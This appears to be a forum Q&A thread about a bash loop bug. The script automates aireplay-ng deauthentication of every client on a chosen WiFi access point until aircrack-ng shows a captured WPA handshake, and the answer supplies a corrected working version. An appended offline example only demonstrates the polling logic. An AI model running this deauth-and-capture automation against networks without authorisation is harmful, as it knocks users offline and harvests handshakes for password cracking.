Trying to figure out how to get this until loop to kill the script when it actually has any data returned. I've tried -z, -n etc. with no luck. This script is designed to take any airodump-ng output for a specific BSSID (in CSV format), iterate through each station and deauthenticate them infinitely on a period of 5m until $SUCCESS returns that a 4-way handshake was captured.
Any help would be greatly appreciated!
#!/bin/bash
#Need to get the BSSID Name
echo "BSSID Name? (Case Sensitive): "
read BSSIDNAME
BSSID=$(cat "$1" | awk -F',' 'NR>2{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d' | sed -n 1p)
until [ "$SUCCESS" -n ]; do
    for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' | sed -e '/^.$/d' ); do
        aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
        sleep 5s;
    done
    SUCCESS=$(aircrack-ng "${BSSIDNAME}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done
Here is the debug output. You can see that it loops even though we received a handshake.
root@Pineapple:/sd/pcap# sh -x ./autodeauth.sh attackme-01.csv
+ echo BSSID Name? (Case Sensitive):
BSSID Name? (Case Sensitive):
+ read BSSIDNAME
attackme
+ + + sed -n 1p
awk -F, NR>2{print $1}
sed -e /Station MAC/d -e /BSSID/d -e /\n/d
+ cat attackme-01.csv
+ BSSID=00:11:11:11:11:11
+ [ -n ]
sh: -n: unknown operand
+ awk+ -F,sed+ NR>5{print $1} -esed
/Station MAC/d -e -e /^.$/d /BSSID/d
+ cat attackme-01.csv
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:00 wlan1mon
05:41:31 Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:31 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
05:41:32 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|60 ACKs]
05:41:33 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|55 ACKs]
05:41:33 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|56 ACKs]
05:41:34 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
+ sleep 5s
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:01 wlan1mon
05:41:39 Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:40 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|49 ACKs]
05:41:40 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|60 ACKs]
05:41:42 Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|63 ACKs]
+ sleep 5s
+ grep WPA (. handshake)
+ aircrack-ng attackme-01.cap -w fakewordlist
+ SUCCESS= 1 00:11:11:11:11:11 attackeme WPA (1 handshake)
+ [ 1 00:11:11:11:11:11 attackme WPA (1 handshake) -n ]
sh: -n: unknown operand
The line:
    SUCCESS=$(something)
will run something once and store the output into the SUCCESS environment variable. Your until loop body never runs that command explicitly, so I think you may believe that $SUCCESS in the until statement is somehow running the command. That is not the case. It's simply re-evaluating the SUCCESS variable. You need to explicitly re-run the command, such as with:
#!/bin/bash
# BSSIDNAME and BSSID are set as in the question's script; the capture file is named after the ESSID (BSSIDNAME), not the MAC
echo "BSSID Name? (Case Sensitive): "
read BSSIDNAME
BSSID=$(awk -F',' 'NR>2{print $1}' "$1" | sed -e '/Station MAC/d' -e '/BSSID/d' | sed -n 1p)
# run the check once up front so SUCCESS is defined for the first test
SUCCESS=$(aircrack-ng "${BSSIDNAME}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
until [ -n "$SUCCESS" ]; do
    # station rows follow the header rows; '/^.$/d' drops the lone carriage-return lines in airodump's CRLF CSV
    for STATION in $(awk -F',' 'NR>5{print $1}' "$1" | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/^.$/d'); do
        aireplay-ng --deauth 5 -a "$BSSID" -c "$STATION" wlan1mon
        sleep 5m
    done
    # re-run the command on every pass: reading $SUCCESS by itself never re-executes anything
    SUCCESS=$(aircrack-ng "${BSSIDNAME}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done
Without that penultimate line, the SUCCESS variable is never actually changing, which would explain why your loop never exits.
You'll hopefully notice the other change that I made to your code, that of changing the line:
    until [ "$SUCCESS" -n ]; do
into:
    until [ -n "$SUCCESS" ]; do
The latter is the correct way to test if the SUCCESS environment variable holds a non-empty string.
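Added example, not code from the question or the answer: it isolates the two shell points the answer makes (the operand order of `-n`, and a command substitution being a one-time snapshot that the loop has to refresh) with a plain text file and grep standing in for the capture file and aircrack-ng, so it runs offline. The temp file names, the `probe` helper, the call counter and the sample "WPA (1 handshake)" line are all constructed here; nothing touches a wireless interface.

```shell
#!/bin/sh
# Correct non-empty test: the -n operator must precede its operand. The
# original `[ "$SUCCESS" -n ]` puts the value first, so [ treats the literal
# "-n" as a bare string and reports "unknown operand".
is_nonempty() { [ -n "$1" ]; }

# Poll until the probe command ($2...) prints something, re-running it on
# every pass. Prints the number of passes; exit status 0 when the probe
# produced output, 1 when the pass limit ($1) was exhausted.
poll_until_output() {
  max=$1; shift
  passes=0
  result=""
  until is_nonempty "$result"; do
    if [ "$passes" -ge "$max" ]; then
      echo "$passes"
      return 1
    fi
    passes=$((passes + 1))
    sleep 1                        # stands in for the work done between checks
    result=$("$@" || true)         # re-evaluate here; reading $result alone never re-runs anything
  done
  echo "$passes"
  return 0
}

# Constructed probe: greps a "capture log" for the handshake marker and bumps a
# counter file, so a caller can confirm the probe really ran once per pass.
probe() {
  counter=$1; logfile=$2
  echo $(( $(cat "$counter") + 1 )) > "$counter"
  grep 'WPA (. handshake)' "$logfile"
}

# Builds the constructed inputs, lets the marker line appear two seconds in,
# and prints "<passes> <probe calls>" so both numbers can be compared.
demo() {
  workdir=$(mktemp -d)
  log="$workdir/capture.log"; counter="$workdir/calls"
  : > "$log"; echo 0 > "$counter"
  ( sleep 2; echo "1  00:11:11:11:11:11  attackme  WPA (1 handshake)" >> "$log" ) &
  passes=$(poll_until_output 10 probe "$counter" "$log") || return 1
  wait
  calls=$(cat "$counter")
  rm -rf "$workdir"
  echo "$passes $calls"
}

# Run the demo directly with: POLL_DEMO=1 sh poll_example.sh
if [ "${POLL_DEMO:-0}" = 1 ]; then demo; fi
```

The pass count and the probe call count come out equal, which is the whole point: the probe is re-executed on every pass, and the loop ends on the first pass where it prints a line. Replace the `until` condition with the original `[ "$result" -n ]` and the same "unknown operand" error from the question's trace appears on the first test.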